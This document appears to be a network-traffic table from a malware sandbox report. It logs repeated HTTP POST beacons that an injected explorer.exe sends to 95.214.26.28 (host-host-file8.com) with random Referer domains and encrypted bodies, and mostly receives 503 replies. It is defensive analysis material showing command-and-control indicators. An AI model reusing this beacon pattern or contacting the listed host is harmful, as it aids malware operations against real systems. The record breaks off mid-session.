Nov 10, 2023 15:37:10.642767906 CET	258	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://swunoda.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 131 Host: host-host-file8.com
Nov 10, 2023 15:37:10.643193960 CET	258	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 4b 83 8f 6b Data Ascii: 9}6F>1.lo}k\wu$f]dKk=H ?_h$QvXc[/Uf)8/.}6N?8
Nov 10, 2023 15:37:10.942137957 CET	259	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.6	49743	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:37:19.611892939 CET	267	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jyicmpi.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 294 Host: host-host-file8.com
Nov 10, 2023 15:37:19.611949921 CET	267	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 33 83 b7 21 Data Ascii: 9}6F>1.lo}k\wu$f]d3!-fduq/VI'~jnWZt2}.9_BXB63ETG:sb:>CzzT#$[3?dpQ}"{Q?Kl1.c0jhI!(aca-W
Nov 10, 2023 15:37:19.918643951 CET	267	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49725	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:36:44.418081045 CET	237	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tmugk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 243 Host: host-host-file8.com
Nov 10, 2023 15:36:44.418103933 CET	237	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 0d ce df 1d Data Ascii: 9}6F>1.lo}k\wu$f]d*qqd46Q=w^mI<f;aN\nQv]O}a/?9FJ<aXP@oaNSB8(M>HTSC1SIX/~I'%) uQQy
Nov 10, 2023 15:36:44.727458954 CET	238	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.6	49744	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:37:28.333453894 CET	268	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jbdwgxah.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 257 Host: host-host-file8.com
Nov 10, 2023 15:37:28.333476067 CET	269	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 58 bc 98 1e Data Ascii: 9}6F>1.lo}k\wu$f]dX?}0FH,c-86QA.;Lt]BAT1TI+*6=1O6CzlZsI<wHbkPNjl#kVbbcaD\\|4o[sD&
Nov 10, 2023 15:37:28.634603024 CET	269	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.6	49745	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:37:40.159674883 CET	270	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hpfeeptar.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 222 Host: host-host-file8.com
Nov 10, 2023 15:37:40.159674883 CET	270	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 39 c7 88 73 Data Ascii: 9}6F>1.lo}k\wu$f]d9sF0t0jiP`$7a}ns-~?=1q(X^sS%wn%,C;3'NL>^mU9TVFLVbq4xuV%/O
Nov 10, 2023 15:37:40.464581966 CET	271	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.6	49746	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:37:43.242945910 CET	271	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ydikox.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 228 Host: host-host-file8.com
Nov 10, 2023 15:37:43.242981911 CET	272	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 54 a9 be 75 Data Ascii: 9}6F>1.lo}k\wu$f]dTuGCfQ`l&0P$qFGe~[7p+&9p9)w\|oyLd#%&DA]-7I];SC1NqKmkZy%+IPOGz"W]
Nov 10, 2023 15:37:43.542344093 CET	272	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.6	49747	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:37:49.217498064 CET	273	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qcunmavvat.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 265 Host: host-host-file8.com
Nov 10, 2023 15:37:49.217530012 CET	273	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 3e c2 a0 1d Data Ascii: 9}6F>1.lo}k\wu$f]d>q={b~'H,tB0O'E4L1UQInPvmINL<_?c#x8_EPY_5+?P\|n? %Pk%K;
Nov 10, 2023 15:37:58.217103958 CET	274	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Fri, 10 Nov 2023 14:37:58 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 36 31 0d 0a 5d 00 00 00 7b fa f2 1f b5 69 2b 38 4f e0 1a 9e dd a8 80 43 13 9c d0 5a 0f 7f 06 e0 b5 d6 fd e5 10 a9 1d d2 76 bf 53 5e da 04 ff e8 3d ef 26 5c 1f f2 fc d8 5a a3 06 9b 5d ca f9 6b dd 66 ab ec d1 5a 34 f9 e7 15 7a a0 fe ed 3d a3 87 ec 06 fc 31 c8 91 69 13 41 6b 5f 0f c5 f3 77 fd b7 4e cd a8 0d 0a 30 0d 0a 0d 0a Data Ascii: 61]{i+8OCZvS^=&\Z]kfZ4z=1iAk_wN0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.6	49748	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:37:58.530220032 CET	275	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kibrkvnbk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 353 Host: host-host-file8.com
Nov 10, 2023 15:37:58.530267954 CET	275	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 9e 66 5d 02 c8 a1 c1 64 2f c5 ac 60 Data Ascii: 9}6F>1.lo}k\wu$f]d/`mq5n/\Sacf&bua5FF\/3ch*BSo!%CesA]_)?`x3`7TEdMW(eh``v$Q{SK?"-
Nov 10, 2023 15:38:18.833267927 CET	276	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.6	49749	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:38:19.162352085 CET	277	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rihjsppp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 207 Host: host-host-file8.com
Nov 10, 2023 15:38:19.162381887 CET	277	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 9f 66 5d 02 c8 a1 c1 64 31 db c0 7d Data Ascii: 9}6F>1.lo}k\wu$f]d1}/ ?fGdJItlO6e3(GUQtPGI2.kFXxYGGrCH"Qx}`N,\|a.[Ie?uYEY:TNQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.6	49750	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:38:27.253597975 CET	278	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mogop.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 153 Host: host-host-file8.com
Nov 10, 2023 15:38:27.253628016 CET	278	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 9c 66 5d 02 c8 a1 c1 64 22 ca 9a 72 Data Ascii: 9}6F>1.lo}k\wu$f]d"rEdpy0Jf"M,[snf\c",>^ B3^S5T\H&0AH`
Nov 10, 2023 15:38:27.555083036 CET	279	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.6	49751	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:38:27.868868113 CET	279	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ebswgoa.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 274 Host: host-host-file8.com
Nov 10, 2023 15:38:27.868921041 CET	280	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 9d 66 5d 02 c8 a1 c1 64 4c ad d7 6a Data Ascii: 9}6F>1.lo}k\wu$f]dLj.z`E\wx_W<<ubhXA.Nw\q8;J]J$WCiGR'PdDEH.>;x/3\|dU%AkD5XA_D7<u$Lr'+Z
Nov 10, 2023 15:38:28.170010090 CET	280	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.6	49752	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:38:28.493575096 CET	281	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hodjcq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 113 Host: host-host-file8.com
Nov 10, 2023 15:38:28.493601084 CET	281	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 9a 66 5d 02 c8 a1 c1 64 46 85 d7 25 Data Ascii: 9}6F>1.lo}k\wu$f]dF%'Km(ZV0JJ~sdDV
Nov 10, 2023 15:38:28.794945002 CET	281	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.6	49753	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:38:29.108978033 CET	282	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vrhgpp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 322 Host: host-host-file8.com
Nov 10, 2023 15:38:29.109035969 CET	283	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 9b 66 5d 02 c8 a1 c1 64 2d c9 a5 72 Data Ascii: 9}6F>1.lo}k\wu$f]d-rGg{mPyu0-?X@bN\|Ql)EK!+#Ca<rfW:LNK~~)wOjeN0YoI#[gr?AjYmuroP%H}KT.ri`I^
Nov 10, 2023 15:38:29.406418085 CET	283	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49726	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:36:45.114145041 CET	238	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rpfwsaim.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 165 Host: host-host-file8.com
Nov 10, 2023 15:36:45.114195108 CET	238	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 2a 9e b7 74 Data Ascii: 9}6F>1.lo}k\wu$f]d*tIFa03~]5N>s!='KRg9COYqQc.XNMEAx
Nov 10, 2023 15:36:45.415339947 CET	239	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.6	49754	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:38:29.724538088 CET	283	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mqetfsc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 219 Host: host-host-file8.com
Nov 10, 2023 15:38:29.725270033 CET	284	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 98 66 5d 02 c8 a1 c1 64 2d ca c3 12 Data Ascii: 9}6F>1.lo}k\wu$f]d-Xr)3\|oU_H<gj+UMP(T 8cL'dIIGLA@e<3iJ?xw--DS<Ql{M#W?gFIVM
Nov 10, 2023 15:38:30.027803898 CET	284	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.6	49755	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:38:30.336473942 CET	285	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rkucq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 352 Host: host-host-file8.com
Nov 10, 2023 15:38:30.336504936 CET	285	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 99 66 5d 02 c8 a1 c1 64 39 c9 c5 6e Data Ascii: 9}6F>1.lo}k\wu$f]d9nKyn'x2P8'eyJ\|.xg:D%'(1PNBSGOz0Y?+yCjVu}JdUR91N\|5S5qZ_GLrSFWM!bt
Nov 10, 2023 15:38:30.636611938 CET	286	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.6	49756	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:38:30.958910942 CET	286	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vngcolxw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 237 Host: host-host-file8.com
